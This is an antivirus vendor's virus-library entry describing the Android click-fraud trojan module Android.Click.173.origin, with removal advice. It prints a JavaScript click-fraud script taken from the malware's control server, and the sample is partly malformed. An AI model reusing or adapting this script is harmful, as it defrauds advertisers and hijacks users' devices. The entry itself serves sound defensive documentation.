ユーザー向け情報

閉じる

マイライブラリ
マイライブラリ

+ マイライブラリに追加

検索
検索

電話
テクニカルサポート利用方法

問い合わせ

新規お問い合わせ

電話(英語)

+7 (495) 789-45-86

フォーラム(英語)

お問い合わせ履歴

新規お問い合わせ

電話(英語)

+7 (495) 789-45-86

Profile

JP

RU CN DE EN ES FR IT JP KZ UZ PL BY
閉じる
サービス
スキャナー
Dr.Web vxCube
トライアル
ウイルスライブラリ
ナレッジベース

テクノロジー

用語

トレーニングコースおよび啓蒙プロジェクト

アンチウイルスに関する誤解と噂

ニュース

Android.Click.173.origin

Added to the Dr.Web virus database: 2018-04-25

Virus description added:

SHA1:

  • SHA1: 1f0776e3cb408839a876cf9e35a5c21dcec060a9

Detecting Trojan software modules (SDK) for Android OS, which perform a variety of malicious activities. They are downloaded and launched by other Trojan SDKs, which criminals integrate into various software. Android.Click.173.origin is downloaded fromhttp://cdn.ads.go******.com/files/* server. The authors of these modules can be Trojan SDK Android.Gmobi developers.

The Android.Click.173.origin managing server is located at https://api.***mobi.com.

Android.Click.173.origin can execute the following actions:

  • sending user information (including the location of the infected device if the application in which the module is embedded has appropriate credentials) to the server;
  • silently downloading and installing the applications if the device is root-accessible or if the application in which the Trojan was embedded has permission for hidden installation (such application should be in the system partition);
  • sending the broadcasting messages upon the server's command, opening windows, running the services specified in the commands (for example, to automatically launch the "installed applications");
  • sending Send SMS messages to pay for various services;
  • displaying ads;
  • downloading web pages, specified by the server, through WebView and simulating user transitions to links using JavaScript scripts downloaded from the management server. For example, the following script has been downloaded from the server:
var json = {
"cmd" : "getHtml",
"id" : "5ad9d7ef4efd4c0828472720",
"no" : 2,
"ctr" : 30,
"info" : "0.00:0/0/0.00",
"capture" : false,
"close" : true
}
function http.get(u)
{
if (!link){
waitAndClose();
return;
}
json.link = link.outerHTML;
if (link.click) {
link.click();
console.log("json://" + JSON.stringify(json))
return;
}
waitAndClose();
}
function waitAndClose(){
setTimeout(function(){
console.log("json://" + JSON.stringify(json))
}, 1000 * 10);
}
var html = document && document.documentElement && document.documentElement.outerHTML
var htmllc = html.toLowerCase()
var closing = false
function waitAndClose(){
closing = true
console.log("json://" + JSON.stringify({
'cmd' : 'close',
'close' : true
}))
}
Expand
source
function getAllTagOf(tag, eachCallback){
var html = ""
var items = document.getElementsByTagName(tag);
if (items && items.length > 0){
for(var i = 0; i < items.length; i++){
if (eachCallback) eachCallback(items[i])
html += items[i].outerHTML
}
}
return html
}
var gcc = atob('d3d3Lmdvb2dsZS5jb20vcmVjYXB0Y2hh')
var cc = atob('Y2FwdGNoYQ==')
var ch = atob('Y29pbmhpdmU=')
if (!htmllc){
} else if (htmllc.indexOf(gcc) != -1){
forceClose()
} else if (htmllc.indexOf(ch) != -1){
forceClose()
} else {
process()
}
function process(){
var all = document.querySelectorAll('button,a,input')
var links = [];
var CTR = json.ctr || 50;
if (closing){
console.log('Closing')
} else if (all.length == 0 || all.length > 10){
json.stop = 'all.length = ' + all.length;
waitAndClose();
} else {
var rnd = new Date().valueOf() % 100;
if (rnd > CTR){
json.stop = 'CTR : ' + rnd + ' > ' + CTR ;
waitAndClose();
} else {
var stop = false;
for(var i = 0; i < all.length; i++){
var item = all[i]
if ('A' == item.tagName){
item._text = item.innerText
links.push(item)
} else if ('BUTTON' == item.tagName){
if (item.type && item.type.toLowerCase() == 'submit'){
item._text = item.value
links.push(item)
}
} else if ('INPUT' == item.tagName){
var type = item.type && item.type.toLowerCase();
if (type == 'checkbox'){
item.checked = true
} else if (type == 'submit'){
item._text = item.value
links.push(item)
} else if (type == 'button'){
item._text = item.value
links.push(item)
} else if (type == 'hidden'){
} else if (type == 'reset'){
} else {
if (item._ignore){
 console.log('skip ' + item.outerHTML)
} else {
json.stop = item.outerHTML;
console.log('Stop :' + json.stop)
stop = true;
break;
}
}
}
}
if (stop || links.length == 0){
waitAndClose();
} else {
var timeout = new Date().valueOf() % 5 + 1;
var index = links.length == 1 ? 0 : (new Date().valueOf() % links.length)
json.action = {
index : index,
count : links.length,
tag : links[index].tagName,
text : links[index].innerText
}
console.log('Timeout : ' + timeout + " Index : " + index + "/" + links.length)
json.close = false;
setTimeout(function(){__click__(links[index])}, 1000 * timeout);
}
 }
}
}

The Trojan interacts with JavaScript on the pages being downloaded using WebChromeClient.onConsoleMessage.

Curing recommendations

Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

Free trial

14 days

Download now
Get it on Google Play